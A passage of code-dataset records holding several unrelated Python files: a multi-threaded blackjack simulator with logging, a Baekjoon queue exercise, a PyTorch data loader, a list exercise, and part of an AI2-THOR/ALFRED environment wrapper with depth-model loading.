__init__(self,userid,session_log,detail_log,break_log,stage_log):\n\t\tpath='.//log//'+str(userid)\n\t\tself.makedir(path)\n\n\t\tself.logfilename=path+'//'+datetime.datetime.now().strftime(\"%Y-%m-%d.%H-%M-%S\")\n\n\t\tself.sessionId=1\n\t\tself.detail_Log=detail_log\n\t\tself.session_Log=session_log\n\t\tself.break_Log=break_log\n\t\tself.stage_Log=stage_log\n\t\tif self.detail_Log:\n\t\t\tself.detailfile=open(self.logfilename +'.detail.txt','w')\n\t\tif self.session_Log:\n\t\t\tself.sessionfile=open(self.logfilename+'.session.txt','w')\n\t\tif self.break_Log:\n\t\t\tself.breakfile=open(self.logfilename+'.break.txt','w')\n\t\tif self.stage_Log:\n\t\t\tself.stagefile=open(self.logfilename+'.stage.txt','w')\n\t\t\tself.stagefile.write('\\n')\n\t\t\tself.stagefile.flush()\n\tdef __del__(self):\n\t\tif self.detail_Log:\n\t\t\tself.detailfile.close()\n\t\tif self.session_Log:\n\t\t\tself.sessionfile.close()\n\t\tif self.break_Log:\n\t\t\tself.breakfile.close()\n\t\tif self.stage_Log:\n\t\t\tself.stagefile.close()\n\tdef makedir(self,path):\n\t\tos.makedirs(path,exist_ok=True)\n\n\tdef detaillog(self,buf):\n\t\tself.detailfile.write(str(self.sessionId)+','+datetime.datetime.now().strftime(\"%Y-%m-%d.%H-%M-%S\")+','+buf)\n\t\tself.detailfile.write('\\n')\n\tdef sessionlog(self,buf):\n\t\tself.sessionfile.write(str(self.sessionId)+','+datetime.datetime.now().strftime(\"%Y-%m-%d.%H-%M-%S\")+','+buf)\n\t\tself.sessionfile.write('\\n')\n\n\t\tself.sessionfile.flush()\n\t\ttry:\n\n\t\t\tself.detailfile.write('\\n')\n\t\t\tself.detailfile.flush()\n\t\texcept:\n\t\t\tpass\n\t\tself.sessionId+=1\n\n\tdef breaklog(self,buf,compare):\n\t\tself.breakfile.write(str(self.sessionId)+','+datetime.datetime.now().strftime(\"%Y-%m-%d.%H-%M-%S\")+','+buf+','+compare)\n\t\tself.breakfile.write('\\n')\n\t\tself.breakfile.write('\\n')\n\t\tself.breakfile.flush()\n\tdef stagelog(self,stagemessage):\n\t\tself.stagefile.write(stagemessage)\n\t\tself.stagefile.write('\\n')\n\t\tself.stagefile.flush()\n\n\n\tdef configDescription(self,config):\n\t\tresult=''\n\t\tif hasattr(config,'best_strategy'):\n\t\t\tresult+='best strategy:'+str(config.best_strategy)\n\t\t\tresult+='\\n'\n\t\tif hasattr(config,'has_double'):\n\t\t\tresult+='has double:'+str(config.has_double)\n\t\t\tresult+='\\n'\n\t\tif hasattr(config,'native_black_return'):\n\t\t\tresult+='native_black_return:'+str(config.native_black_return)\n\t\t\tresult+='\\n'\n\t\tif hasattr(config,'has_split'):\n\t\t\tresult+='has_split:'+str(config.has_split)\n\t\t\tresult+='\\n'\n\t\tif hasattr(config,'stake_start') and hasattr(config,'stake_end'):\n\t\t\tresult+='stake is start from %d to %d'%(config.stake_start,config.stake_end)\n\t\t\tresult+='\\n'\n\t\tif hasattr(config,'stage_size') and hasattr(config,'stake_stride'):\n\t\t\tresult+='add %d stake per %d round'%(config.stake_stride,config.stage_size)\n\t\t\tresult+='\\n'\n\t\tresult+='\\n'\n\t\tself._config=config\n\n\t\treturn result\n \n\t\t\n\t\t\n\n\n\nclass Simuclient(threading.Thread):\n\t\n\n\tdef __init__(self,userid):\n\t\tthreading.Thread.__init__(self)\n\t\t\n\t\tself.starttime=datetime.datetime.now()\n\t\tself.config=configfile.ConfigFile().userconfig(userid)\n\t\t\n\t\tself.uid=userid\n\t\tself.win=0\n\t\tself.lost=0\n\t\tself.push=0\n\n\t\tself.net=zhongcaiweiyou.zhongcaiweiyou()\n\t\tself.player=Player()\n\t\tself.strategy=strategytable.Strategy(self.config.best_strategy)\n\t\tself.loging=Loging(userid,self.config.session_log,self.config.detail_log,self.config.break_log,self.config.stage_log)\n\t\tif self.config.session_log_head:\n\t\t\tresult=self.loging.configDescription(self.config)\n\t\t\tself.loging.sessionfile.write(result)\n\t\t\tself.loging.sessionfile.flush()\n\t\tif self.config.stage_log_head:\n\t\t\tresult=self.loging.configDescription(self.config)\n\t\t\tself.loging.stagefile.write(result)\n\t\t\tself.loging.stagefile.flush()\n\n\n\tdef __del__(self):\n\t\ttry:\n\t\t\tif self.net._connected:\n\t\t\t\tself.net.disconnect()\n\t\texcept:\n\t\t\tpass\n\tdef run(self):\n\t\tself.player_action()\n\t\t\n\tdef deal(self,stake):\n\t\tself.player.bust=False\n\t\tif (self.player.financial.CoinBlance>100):\n\t\t\tself.player.fristHand,self.player.dealerhand= self.net.deal(stake)\n\t\telse:\n\t\t\tself.roundState='OUTOFMONEY'\n\t\t\tif _DEBUG_:\n\t\t\t\tprint (\"insufficient blance\")\n\n\tdef hit(self):\n\t\ta,b=self.net.hit()\n\t\tif a.get_count()>0:\n\t\t\tself.player.fristHand=a\n\t\tif b.get_count()>0:\n\t\t\tself.player.dealerhand=b\n\n\tdef double(self):\n\t\ta,b=self.net.double()\n\t\tif a.get_count()>0:\n\t\t\tself.player.fristHand=a\n\t\tif b.get_count()>0:\n\t\t\tself.player.dealerhand=b\n\n\tdef stand(self):\n\t\ta,b=self.net.stand()\n\t\tif a.get_count()>0:\n\t\t\tself.player.fristHand=a\n\t\tif b.get_count()>0:\n\t\t\tself.player.dealerhand=b\n\n\tdef login(self,userid,appid):\n\t\tself.player.financial.CoinBlance= self.net.login(userid,appid)\n\t\tif _DEBUG_:\n\t\t\tprint ('in simu login')\n\t\t\tprint(\"player blance \",self.player.financial.CoinBlance)\n\t\tself.player.financial.startCoinBlance=self.player.financial.CoinBlance\n\t\treturn self.player.financial.CoinBlance\n\t\t\n\t\t\n\tdef getJudgment(self,playerhand,dealerhand,stake):\n\t\tself.roundState='DEAL'\n\t\taward=0\n\t\tif playerhand.get_value()>21:\n\t\t\tresult= 'DEALER_WIN'\n\t\t\tself.lost+=1\n\t\t\taward=0\n\t\telif dealerhand.get_value()>21:\n\t\t\tself.win+=1\n\t\t\tresult= 'PLAYER_WIN'\n\t\t\tself.win+=1\n\t\t\taward=stake*2\n\t\telif (playerhand.get_count()==2) and (playerhand.get_value()==21):\n\t\t\tresult= 'PLAYER_BLACKJACK'\n\t\t\tself.win+=1\n\t\t\taward=stake*self.config.native_black_return\n\n\t\telif playerhand.get_value()>dealerhand.get_value():\n\t\t\tresult= 'PLAYER_WIN'\t\n\t\t\tself.win+=1\n\t\t\taward=stake*2\n\t\telif playerhand.get_value()100):\n\t\t\ttry:\n\t\t\t\tstrategy=''\n\t\t\t\twiner=''\n\t\t\t\tif self.roundState=='DEAL':\n\t\t\t\t\troundStake=self.player.financial.stake\n\t\t\t\t\tresult=self.deal(self.player.financial.stake)\n\t\t\t\t\tself.detailMaker(self.player.fristHand,self.player.dealerhand,self.roundState,strategy,winer)\n\n\t\t\t\t\tif self.player.fristHand.get_value()!=21:\n\t\t\t\t\t\tself.roundState='HIT'\n\t\t\t\t\telse:\n\t\t\t\t\t\tself.roundState='SETTLE'\n\t\t\t\tif _DEEP_DEBUG_ :\n\t\t\t\t\tprint ('after deal')\n\t\t\t\t\tprint ('stage,round,stake,stage size')\n\t\t\t\t\tprint (self.player.financial.stage,self.player.financial.round,self.player.financial.stake,self.config.stage_size)\n\n\t\t\t\tif self.roundState=='HIT':\n\t\t\t\t\tstrategy=self.strategy.getStrategy(self.player.fristHand,self.player.dealerhand)\n\t\t\t\t\tif (strategy=='H') or (strategy=='P'):\n\t\t\t\t\t\tresult=self.hit()\n\n\t\t\t\t\t\tself.detailMaker(self.player.fristHand,self.player.dealerhand,self.roundState,strategy,winer)\n\n\t\t\t\t\t\tif self.player.fristHand.get_value()<=21:\n\t\t\t\t\t\t\tself.roundState='HIT'\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tself.roundState='SETTLE'\n\n\t\t\t\t\telif strategy=='D':\n\t\t\t\t\t\tself.player.financial.stake*=2\n\t\t\t\t\t\tresult=self.double()\n\t\t\t\t\t\t\n\t\t\t\t\t\tself.detailMaker(self.player.fristHand,self.player.dealerhand,self.roundState,strategy,winer)\n\t\t\t\t\t\tself.roundState='SETTLE'\n\n\t\t\t\t\t\t\n\t\t\t\t\telif strategy=='P':\n\t\t\t\t\t\tpass\n\n\t\t\t\t\telif strategy=='S':\n\t\t\t\t\t\tresult=self.stand()\n\t\t\t\t\t\tself.detailMaker(self.player.fristHand,self.player.dealerhand,self.roundState,strategy,winer)\n\t\t\t\t\t\tself.roundState='SETTLE'\n\n\t\t\t\tif self.roundState=='SETTLE':\n\t\t\t\t\twiner,award=self.getJudgment(self.player.fristHand,self.player.dealerhand,self.player.financial.stake)\n\t\t\t\t\tif _DEEP_DEBUG_ :\n\t\t\t\t\t\tprint ('Judgment over')\n\t\t\t\t\t\tprint ('stage,round,stake,stage size')\n\t\t\t\t\t\tprint (self.player.financial.stage,self.player.financial.round,self.player.financial.stake,self.config.stage_size)\n\n\t\t\t\t\tself.detailMaker(self.player.fristHand,self.player.dealerhand,self.roundState,strategy,winer)\n\t\t\t\t\tself.player.financial.stake=roundStake\n\t\t\t\t\tself.roundVerify(strategy,winer,award)\n\t\t\t\t\tif _DEEP_DEBUG_ :\n\t\t\t\t\t\tprint ('round over')\n\t\t\t\t\t\tprint ('stage,round,stake,stage size')\n\t\t\t\t\t\tprint (self.player.financial.stage,self.player.financial.round,self.player.financial.stake,self.config.stage_size)\n\n\t\t\texcept IOError as e:\n\t\t\t\tprint (e)\n\n\n\t\t\t\t\t\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\ndef main():\n\tconfig=configfile.ConfigFile()\n\n\n\tcli=[]\n\tstart_uid=config.mainconfig.start_user_id\n\tend_uid=config.mainconfig.end_user_id\n\n\tfor i in range(start_uid,end_uid+1):\n\t\tcli.insert((i-start_uid),Simuclient(i))\n\t\tcli[i-start_uid].start()\n\t\tprint ('simu thread ' ,i,' Started')\n\tprint(\"go go go!\")\n\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"tangyongfeng/simu","sub_path":"simu.py","file_name":"simu.py","file_ext":"py","file_size_in_byte":12026,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22454999553","text":"class Node:\n def __init__(self, x=-1):\n self.link = None\n self.data = x\n self.size = 0\n self.isImport = False\n \n def push(self, nextNode):\n self.link = nextNode\n \n def pop(self):\n self.link = self.link.link\n \ntotal = int(input())\n\n\ndef importantIndex(head):\n index = 0\n # 1 2 3 4\n\n max_data = head.link.data\n h = head.link.link\n i=1\n while h:\n if max_data < h.data:\n index = i\n max_data = h.data\n h = h.link\n i += 1\n return index\n \n\nfor i in range(total):\n doc, im = map(int, input().split()) \n data = list(map(int, input().split()))\n \n head = tail = Node()\n for i,d in enumerate(data):\n tail.push(Node(d))\n tail = tail.link\n head.size += 1\n if i == im:\n tail.isImport = True\n \n count = 1\n while True:\n index = importantIndex(head)\n \n for _ in range(index):\n tail.push(head.link)\n tail = tail.link\n head.pop()\n tail.link=None\n \n if head.link.isImport:\n print(count)\n break\n \n head.pop()\n head.size -= 1\n count+=1","repo_name":"parksey/baekjoon","sub_path":"QueueDeque/1966.py","file_name":"1966.py","file_ext":"py","file_size_in_byte":1243,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70002190889","text":"from torch.utils.data import Dataset\nfrom torch.utils.data import DataLoader\n\nclass Custom_dataset(Dataset):\n def __init__(self, input_ids, token_type_ids, attn_mask_ids, label):\n self.input = input_ids\n self.token_type = token_type_ids\n self.attn_mask = attn_mask_ids\n self.label = label\n \n def __len__(self):\n return len(self.input) \n\n def __getitem__(self, idx):\n input = self.input[idx]\n tok = self.token_type[idx]\n attn = self.attn_mask[idx]\n label = torch.tensor(self.label[idx], dtype= torch.long).view(-1)\n\n return input, attn, tok ,label\n \ntrain_dataset = Custom_dataset(input_ids_t, token_type_ids_t, mask_ids_t, train_data['label'])\nvalid_dataset = Custom_dataset(input_ids_v, token_type_ids_v, mask_ids_v, valid_data['label'])\ntrain_dataloader = DataLoader(train_dataset, batch_size=Batch_size, shuffle=True)\nvalid_dataloader = DataLoader(valid_dataset, batch_size=Batch_size, shuffle=True)\n","repo_name":"younggeun-kim/korean_chat_sentiment_classification","sub_path":"dataloader.py","file_name":"dataloader.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19948247769","text":"numbers = input().split(\", \")\nresult = []\n\nfor number in numbers:\n number = int(number)\n result.append(number)\n\nfor number in result:\n if number == 0:\n result.append(result.pop(result.index(number)))\n\nprint(result)","repo_name":"achkataa/Softuni-Programming-Fundamentals","sub_path":"listsBasics/1.Zeros to Back.py","file_name":"1.Zeros to Back.py","file_ext":"py","file_size_in_byte":230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2947488079","text":"import os\nimport sys\n\nimport cv2\nimport copy\nimport alfred_utils.gen.constants as constants\nimport numpy as np\nfrom collections import Counter, OrderedDict\nfrom alfred_utils.env.tasks import get_task\nfrom ai2thor.controller import Controller\nimport alfred_utils.gen.utils.image_util as image_util\nfrom alfred_utils.gen.utils import game_util\nfrom alfred_utils.gen.utils.game_util import get_objects_of_type, get_obj_of_type_closest_to_obj\nimport torch\nfrom torch.autograd import Variable\nfrom models.depth.alfred_perception_models import AlfredSegmentationAndDepthModel\n\nfrom arguments import get_args\n\nimport quaternion\nimport gym\n\nimport envs.utils.pose as pu\n\nimport matplotlib\n\nif sys.platform == 'darwin':\n matplotlib.use(\"tkagg\")\nelse:\n matplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as mpatches\n\nimport pickle\nfrom types import SimpleNamespace\nimport skimage.morphology\n\n\nDEFAULT_RENDER_SETTINGS = {'renderImage': True,\n 'renderDepthImage': True,\n 'renderClassImage': False,\n 'renderObjectImage': True,\n }\n\ndef noop(self):\n pass\n\nclass ThorEnvCode(Controller):\n '''\n an extension of ai2thor.controller.Controller for ALFRED tasks\n '''\n def __init__(self, args, rank, x_display=constants.X_DISPLAY,\n player_screen_height=constants.DETECTION_SCREEN_HEIGHT,\n player_screen_width=constants.DETECTION_SCREEN_WIDTH,\n quality='MediumCloseFitShadows',\n build_path=constants.BUILD_PATH,\n habitat_config=None):\n\n super().__init__(quality=quality)\n \n self.local_executable_path = build_path\n self.steps_taken = 0\n \n if args.matrix:\n Controller.lock_release = noop\n Controller.unlock_release = noop\n Controller.prune_releases = noop\n \n self.start(x_display=args.x_display,\n player_screen_height=player_screen_height,\n player_screen_width=player_screen_width)\n self.task = None\n\n # internal states\n self.cleaned_objects = set()\n self.cooled_objects = set()\n self.heated_objects = set()\n\n #initializations compatible with object_goal_env\n if args.visualize:\n plt.ion()\n if args.print_images or args.visualize:\n if args.visualize == 1:\n widths = [4, 4, 3]\n total_w = 11\n elif args.visualize == 2:\n widths = [4, 3, 3]\n total_w = 10\n else:\n widths = [4, 3]\n self.figure, self.ax = plt.subplots(1, len(widths), figsize=(6*16./9., 6),\n gridspec_kw={'width_ratios': widths},\n facecolor=\"whitesmoke\",\n num=\"Thread {}\".format(rank))\n \n self.args = args \n self.rank = rank\n \n self.action_space = gym.spaces.Discrete(3)\n\n self.observation_space = gym.spaces.Box(0, 255,\n (3, constants.SCREEN_HEIGHT,\n constants.SCREEN_WIDTH),\n dtype='uint8')\n \n self.episode_no = 0\n self.last_scene_path = None\n self.info = {}\n self.info['distance_to_goal'] = None\n self.info['spl'] = None\n self.info['success'] = None\n \n self.view_angle = 0\n self.consecutive_steps = False\n self.final_sidestep = False\n \n self.actions = []\n self.max_depth = 5\n\n if args.use_learned_depth:\n self.depth_gpu = torch.device(\"cuda:\" + str(args.depth_gpu) if args.cuda else \"cpu\")\n if not(args.valts_depth):\n bts_args = SimpleNamespace(model_name='bts_nyu_v2_pytorch_densenet161' ,\n encoder='densenet161_bts',\n dataset='alfred',\n input_height=300,\n input_width=300,\n max_depth=5,\n mode = 'test',\n device = self.depth_gpu,\n set_view_angle=False,\n load_encoder=False,\n load_decoder=False,\n bts_size=512)\n\n if self.args.depth_angle or self.args.cpp:\n bts_args.set_view_angle = True\n bts_args.load_encoder = True\n\n self.depth_pred_model = BtsModel(params=bts_args).to(device=self.depth_gpu)\n print(\"depth initialized\")\n\n if args.cuda:\n ckpt_path = 'models/depth/depth_models/' + args.depth_checkpoint_path \n else:\n ckpt_path = 'models/depth/depth_models/' + args.depth_checkpoint_path \n checkpoint = torch.load(ckpt_path, map_location=self.depth_gpu)['model']\n\n new_checkpoint = OrderedDict()\n for k, v in checkpoint.items():\n name = k[7:] # remove `module.`\n new_checkpoint[name] = v\n del checkpoint\n # load params\n self.depth_pred_model.load_state_dict(new_checkpoint)\n self.depth_pred_model.eval()\n self.depth_pred_model.to(device=self.depth_gpu)\n\n #Use Valts depth\n else:\n\n model_path ='valts/model-2000-best_silog_10.13741' #45 degrees only model\n\n if self.args.depth_model_old:\n model_path ='valts/model-34000-best_silog_16.80614'\n\n elif self.args.depth_model_45_only:\n model_path = 'valts/model-500-best_d3_0.98919'\n\n self.depth_pred_model = AlfredSegmentationAndDepthModel()\n\n state_dict = torch.load('models/depth/depth_models/' +model_path, map_location=self.depth_gpu)['model']\n\n new_checkpoint = OrderedDict()\n for k, v in state_dict.items():\n name = k[7:] # remove `module.`\n new_checkpoint[name] = v\n \n state_dict = new_checkpoint\n del new_checkpoint\n\n self.depth_pred_model.load_state_dict(state_dict)\n self.depth_pred_model.eval()\n self.depth_pred_model.to(device=self.depth_gpu)\n\n if self.args.separate_depth_for_straight:\n model_path = 'valts0/model-102500-best_silog_17.00430'\n\n \n\n self.depth_pred_model_0 = AlfredSegmentationAndDepthModel()\n state_dict = torch.load('models/depth/depth_models/' +model_path, map_location=self.depth_gpu)['model']\n\n new_checkpoint = OrderedDict()\n for k, v in state_dict.items():\n name = k[7:] # remove `module.`\n new_checkpoint[name] = v\n \n state_dict = new_checkpoint\n del new_checkpoint\n\n self.depth_pred_model_0.load_state_dict(state_dict)\n self.depth_pred_model_0.eval()\n self.depth_pred_model_0.to(device=self.depth_gpu)\n \n \n print(\"ThorEnv started.\")\n \n #Added for my convenience\n def setup_scene(self, traj_data, task_type, r_idx, args, reward_type='dense'):\n '''\n intialize the scene and agent from the task info\n '''\n # scene setup\n self.view_angle = 30\n scene_num = traj_data['scene']['scene_num']\n object_poses = traj_data['scene']['object_poses']\n dirty_and_empty = traj_data['scene']['dirty_and_empty']\n object_toggles = traj_data['scene']['object_toggles']\n self.steps_taken = 0\n self.errs = []\n self.actions = [dict(action=\"LookDown_15\", forceAction=True)]\n if not(self.args.approx_horizon):\n self.camera_horizon =0\n else:\n self.camera_horizon = 0\n\n scene_name = 'FloorPlan%d' % scene_num\n self.reset(scene_name, return_event=True)\n self.restore_scene(object_poses, object_toggles, dirty_and_empty)\n if not(self.args.test):\n self.set_task(traj_data, task_type, args, task_type_optional=task_type)\n\n # initialize to start position\n init_dict = dict(traj_data['scene']['init_action'])\n obs, _, _, info = self.step(init_dict)\n if not(self.args.approx_horizon):\n self.camera_horizon =self.event.metadata['agent']['cameraHorizon']\n else:\n self.camera_horizon = 30\n obs, _, _, info = self.step(dict(action='LookDown_15',\n forceAction=True))\n objects = self.event.metadata[\"objects\"]\n tables = []\n \n if not(r_idx is None):\n print(\"Task: %s\" % (traj_data['turk_annotations']['anns'][r_idx]['task_desc']))\n\n # setup task for reward\n if not(self.args.test):\n self.set_task(traj_data, task_type, args, reward_type=reward_type, task_type_optional=task_type)\n self.info = info\n \n return obs, info\n\n\n def reset(self, scene_name_or_num,\n grid_size=constants.AGENT_STEP_SIZE / constants.RECORD_SMOOTHING_FACTOR,\n camera_y=constants.CAMERA_HEIGHT_OFFSET,\n render_image=constants.RENDER_IMAGE,\n render_depth_image=constants.RENDER_DEPTH_IMAGE,\n render_class_image=constants.RENDER_CLASS_IMAGE,\n render_object_image=constants.RENDER_OBJECT_IMAGE,\n visibility_distance=constants.VISIBILITY_DISTANCE,\n return_event = False):\n '''\n reset scene and task states\n '''\n print(\"Resetting ThorEnv\")\n\n if type(scene_name_or_num) == str:\n scene_name = scene_name_or_num\n else:\n scene_name = 'FloorPlan%d' % scene_name_or_num\n\n self.accumulated_pose = np.array([0.0,0.0,0.0])\n super().reset(scene_name)\n event = super().step(dict(\n action='Initialize',\n gridSize=grid_size,\n cameraY=camera_y,\n renderImage=render_image,\n renderDepthImage=render_depth_image,\n renderClassImage=render_class_image,\n renderObjectImage=render_object_image,\n visibility_distance=visibility_distance,\n makeAgentsVisible=False,\n ))\n self.event = event\n\n # reset task if specified\n if self.task is not None:\n self.task.reset()\n\n # clear object state changes\n self.reset_states()\n \n self.timestep = 0\n self.stopped = False\n self.path_length = 1e-5\n \n self.info['time'] = self.timestep\n self.info['sensor_pose'] = [0., 0., 0.]\n \n self.last_sim_location = self.get_sim_location()\n self.o = 0.0\n self.o_behind = 0.0\n \n if return_event:\n return event\n else:\n rgb = torch.tensor(event.frame.copy()).numpy() #shape (h, w, 3)\n depth = torch.tensor(event.depth_frame.copy()).numpy() #shape (h, w)\n depth /= 1000.0\n depth = np.expand_dims(depth, 2)\n \n state = np.concatenate((rgb, depth), axis = 2).transpose(2, 0, 1)\n \n return state, self.info\n\n\n def get_pose_change_approx(self, last_action, whether_success):\n if not(whether_success):\n return 0.0, 0.0, 0.0\n else:\n if \"MoveAhead\" in last_action:\n dx, dy, do = 0.25, 0.0, 0.0\n elif \"RotateLeft\" in last_action:\n dx, dy = 0.0, 0.0\n do = np.pi/2\n elif \"RotateRight\" in last_action:\n dx, dy = 0.0, 0.0\n do = -np.pi/2\n else:\n dx, dy, do = 0.0, 0.0, 0.0\n\n return dx, dy, do \n\n def get_pose_change_approx_relative(self, last_action, whether_success):\n if not(whether_success):\n return 0.0, 0.0, 0.0\n else:\n if \"MoveAhead\" in last_action:\n do = 0.0\n if abs(self.o + 2*np.pi) <=1e-1 or abs(self.o) <=1e-1 or abs(self.o - 2*np.pi) <=1e-1: #o is 0\n dx = 0.25\n dy = 0.0\n elif abs(self.o + 2*np.pi - np.pi/2) <=1e-1 or abs(self.o - np.pi/2) <=1e-1 or abs(self.o - 2*np.pi - np.pi/2) <=1e-1:\n dx = 0.0\n dy = 0.25\n elif abs(self.o + 2*np.pi - np.pi) <=1e-1 or abs(self.o - np.pi) <=1e-1 or abs(self.o - 2*np.pi - np.pi) <=1e-1:\n dx = -0.25\n dy = 0.0\n elif abs(self.o + 2*np.pi - 3*np.pi/2) <=1e-1 or abs(self.o - 3*np.pi/2) <=1e-1 or abs(self.o - 2*np.pi - 3*np.pi/2) <=1e-1:\n dx = 0.0\n dy = -0.25\n else:\n raise Exception(\"angle did not fall in anywhere\")\n elif \"RotateLeft\" in last_action:\n dx, dy = 0.0, 0.0\n do = np.pi/2\n elif \"RotateRight\" in last_action:\n dx, dy = 0.0, 0.0\n do = -np.pi/2\n else:\n dx, dy, do = 0.0, 0.0, 0.0\n\n self.o = self.o + do\n if self.o >= np.pi- 1e-1:\n self.o -= 2 * np.pi\n\n return dx, dy, do \n\n #Just closest angle by 15 degrees to the horizon\n def view_angle(self):\n hor = int(self.event.metadata['agent']['cameraHorizon']) \n remainder = hor % 15\n remnant = int(hor/15)\n if remainder <= 7:\n return hor - remainder\n else:\n return 15 * (remnant +1)\n\n def reset_states(self):\n '''\n clear state changes\n '''\n self.cleaned_objects = set()\n self.cooled_objects = set()\n self.heated_objects = set()\n\n def restore_scene(self, object_poses, object_toggles, dirty_and_empty):\n '''\n restore object locations and states\n '''\n super().step(dict(\n action='Initialize',\n gridSize=constants.AGENT_STEP_SIZE / constants.RECORD_SMOOTHING_FACTOR,\n cameraY=constants.CAMERA_HEIGHT_OFFSET,\n renderImage=constants.RENDER_IMAGE,\n renderDepthImage=constants.RENDER_DEPTH_IMAGE,\n renderClassImage=constants.RENDER_CLASS_IMAGE,\n renderObjectImage=constants.RENDER_OBJECT_IMAGE,\n visibility_distance=constants.VISIBILITY_DISTANCE,\n makeAgentsVisible=False,\n ))\n if len(object_toggles) > 0:\n super().step((dict(action='SetObjectToggles', objectToggles=object_toggles)))\n\n if dirty_and_empty:\n super().step(dict(action='SetStateOfAllObjects',\n StateChange=\"CanBeDirty\",\n forceAction=True))\n super().step(dict(action='SetStateOfAllObjects',\n StateChange=\"CanBeFilled\",\n forceAction=False))\n super().step((dict(action='SetObjectPoses', objectPoses=object_poses)))\n\n def set_task(self, traj, task_type, args, reward_type='sparse', max_episode_length=2000, task_type_optional=None):\n '''\n set the current task type (one of 7 tasks)\n '''\n self.task = get_task(task_type, traj, self, args, reward_type=reward_type, max_episode_length=max_episode_length, task_type_optional=task_type_optional)\n \n def depth_center(self, depth_est):\n ht, wd, = 300, 300 \n ww = 544; hh = 416 #Change accordingly \n xx = (ww - wd) // 2\n yy = (hh - ht) // 2\n\n return depth_est[:, :, yy:yy+ht, xx:xx+wd]\n\n def pad_rgb(self, rgb, ww=544, hh=416):\n ht, wd, cc= rgb.shape\n ht, wd, = 300, 300 \n\n # create new image of desired size and color (blue) for padding\n color = (255,255,255) #black\n result = np.full((hh,ww,cc), color, dtype=np.uint8)\n\n # compute center offset\n xx = (ww - wd) // 2\n yy = (hh - ht) // 2\n\n # copy img image into center of result image\n result[yy:yy+ht, xx:xx+wd] = rgb\n return result\n\n\n def success_for_look(self, action):\n wheres = np.where(self.prev_rgb != self.event.frame)\n wheres_ar = np.zeros(self.prev_rgb.shape)\n wheres_ar[wheres] = 1\n wheres_ar = np.sum(wheres_ar, axis=2).astype(bool)\n connected_regions = skimage.morphology.label(wheres_ar, connectivity=2)\n unique_labels = [i for i in range(1, np.max(connected_regions)+1)]\n max_area = -1\n for lab in unique_labels:\n wheres_lab = np.where(connected_regions == lab)\n max_area = max(len(wheres_lab[0]), max_area)\n if action in ['OpenObject', 'CloseObject'] and max_area > 500:\n success = True\n elif max_area > 100:\n success = True\n else:\n success = False\n return success\n\n def step(self, action, smooth_nav=False):\n self.prev_rgb = copy.deepcopy(self.event.frame)\n self.prev_depth = copy.deepcopy(self.event.depth_frame)\n self.prev_seg = copy.deepcopy(self.event.instance_segmentation_frame)\n '''\n overrides ai2thor.controller.Controller.step() for smooth navigation and goal_condition updates\n '''\n if action['action'] == '<>':\n self.stopped = True\n \n else:\n if smooth_nav:\n if \"MoveAhead\" in action['action']:\n self.smooth_move_ahead(action)\n elif \"Rotate\" in action['action']:\n self.smooth_rotate(action)\n elif \"Look\" in action['action']:\n self.smooth_look(action)\n else:\n super().step(action)\n else:\n if \"LookUp\" in action['action']:\n angle = float(action['action'].split(\"_\")[1])\n self.event =self.look_angle(-angle)\n if not(self.args.approx_last_action_success) and self.event.metadata['lastActionSuccess']:\n self.camera_horizon += -angle\n elif self.args.approx_last_action_success and self.success_for_look(action['action']):\n self.camera_horizon += -angle\n elif \"LookDown\" in action['action']:\n angle = float(action['action'].split(\"_\")[1])\n self.event= self.look_angle(angle)\n if not(self.args.approx_last_action_success) and self.event.metadata['lastActionSuccess']:\n self.camera_horizon += angle\n elif self.args.approx_last_action_success and self.success_for_look(action['action']):\n self.camera_horizon += angle\n else:\n self.event = super().step(action)\n \n\n self.event =self.update_states(action)\n self.check_post_conditions(action)\n \n # Get pose change\n if not(self.args.approx_pose):\n if self.consecutive_steps == False:\n dx, dy, do = self.get_pose_change()\n self.info['sensor_pose'] = [dx, dy, do]\n self.path_length += pu.get_l2_distance(0, dx, 0, dy)\n else:\n if self.final_sidestep:\n dx, dy, do = self.get_pose_change()\n self.info['sensor_pose'] = [dx, dy, do]\n self.path_length += pu.get_l2_distance(0, dx, 0, dy)\n else:\n pass\n else:\n if self.args.approx_last_action_success:\n whether_success = self.success_for_look(action['action'])\n else:\n whether_success = self.event.metadata['lastActionSuccess']\n if self.consecutive_steps:\n last_action = action['action']\n dx, dy, do = self.get_pose_change_approx_relative(last_action, whether_success)\n self.accumulated_pose += np.array([dx, dy, do])\n if self.accumulated_pose[2] >= np.pi -1e-1:\n self.accumulated_pose[2] -= 2 * np.pi\n if self.final_sidestep:\n self.info['sensor_pose'] = copy.deepcopy(self.accumulated_pose).tolist()\n self.path_length += pu.get_l2_distance(0, dx, 0, dy)\n self.accumulated_pose = np.array([0.0,0.0,0.0])\n self.o = 0.0\n else:\n last_action = action['action']\n dx, dy, do = self.get_pose_change_approx(last_action, whether_success)\n self.info['sensor_pose'] = [dx, dy, do]\n self.path_length += pu.get_l2_distance(0, dx, 0, dy)\n \n \n \n done = self.get_done()\n \n if done:\n spl, success, dist = 0,0,0\n self.info['distance_to_goal'] = dist\n self.info['spl'] = spl\n self.info['success'] = success\n \n \n self.timestep += 1\n self.info['time'] = self.timestep\n \n\n rgb = self.event.frame.copy() #shape (h, w, 3)\n rgb = cv2.cvtColor(rgb, cv2.COLOR_RGB2BGR)\n\n depth = torch.tensor(self.event.depth_frame.copy()).numpy() #shape (h, w)\n depth /= 1000.0 #in meters\n\n depth = np.expand_dims(depth, 2)\n \n state = np.concatenate((rgb, depth), axis = 2).transpose(2, 0, 1)\n \n rew = 0.0\n \n self.steps_taken +=1\n \n return state, rew, done, self.info\n \n def sim_continuous_to_sim_map(self, sim_loc):\n #x, y, o = self.get_sim_location()\n x, y, o = sim_loc\n min_x, min_y = self.map_obj_origin/100.0\n x, y = int((-x - min_x)*20.), int((-y - min_y)*20.)\n\n o = np.rad2deg(o) + 180.0\n return y, x, o\n \n def get_pose_change(self):\n curr_sim_pose = self.get_sim_location()\n dx, dy, do = 